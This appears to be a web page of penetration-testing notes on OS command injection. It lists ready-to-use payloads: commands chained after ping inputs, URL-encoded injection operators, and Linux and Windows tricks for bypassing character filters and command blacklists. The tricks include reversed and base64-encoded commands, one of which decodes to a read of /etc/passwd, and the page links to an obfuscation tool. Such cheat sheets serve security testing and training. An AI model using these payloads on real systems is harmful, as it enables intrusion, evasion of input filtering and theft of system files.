Aller au contenu

Payloads

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
ping 127.0.0.1; whoami
ping -c 1 127.0.0.1 && whoami
ping -c 1 127.0.0.1 || whoami
127.0.0.1%0a whoami
127.0.0.1%0a{ls,-la}
w"h"o"am"i
who$@ami
w\ho\am\i
who^ami
WhOaMi
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(rev<<<'imaohw')
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

https://github.com/Bashfuscator/Bashfuscator

Injection Operators

Injection Operator Injection Character URL-Encoded Character Executed Command
Semicolon ; %3b Both
New Line \n %0a Both
Background & %26 Both (second output generally shown first)
Pipe \| %7c Both (only second output is shown)
AND && %26%26 Both (only if first succeeds)
OR \|\| %7c%7c Second (only if first fails)
Sub-Shell `` %60%60 Both (Linux-only)
Sub-Shell $() %24%28%29 Both (Linux-only)

Linux

Filtered Character Bypass

Code Description
printenv Can be used to view all environment variables
Spaces
%09 Using tabs instead of spaces
${IFS} Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
{ls,-la} Commas will be replaced with spaces
Other Characters
${PATH:0:1} Will be replaced with /
${LS_COLORS:10:1} Will be replaced with ;
$(tr '!-}' '"-~'<<<[) Shift character by one ([ -> \)

Blacklisted Command Bypass

Code Description
Character Insertion
' or " Total must be even
$@ or \ Linux only
Case Manipulation
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") Execute command regardless of cases
$(a="WhOaMi";printf %s "${a,,}") Another variation of the technique
Reversed Commands
echo 'whoami' \| rev Reverse a string
$(rev<<<'imaohw') Execute reversed command
Encoded Commands
echo -n 'cat /etc/passwd \| grep 33' \| base64 Encode a string with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) Execute b64 encoded string

Windows

Filtered Character Bypass

Code Description
Get-ChildItem Env: Can be used to view all environment variables - (PowerShell)
Spaces
%09 Using tabs instead of spaces
%PROGRAMFILES:~10,-5% Will be replaced with a space - (CMD)
$env:PROGRAMFILES[10] Will be replaced with a space - (PowerShell)
Other Characters
%HOMEPATH:~0,-17% Will be replaced with \ - (CMD)
$env:HOMEPATH[0] Will be replaced with \ - (PowerShell)

Blacklisted Command Bypass

Code Description
Character Insertion
' or " Total must be even
^ Windows only (CMD)
Case Manipulation
WhoAmi Simply send the character with odd cases
Reversed Commands
"whoami"[-1..-20] -join '' Reverse a string
iex "$('imaohw'[-1..-20] -join '')" Execute reversed command
Encoded Commands
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) Encode a string with base64
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))" Execute b64 encoded string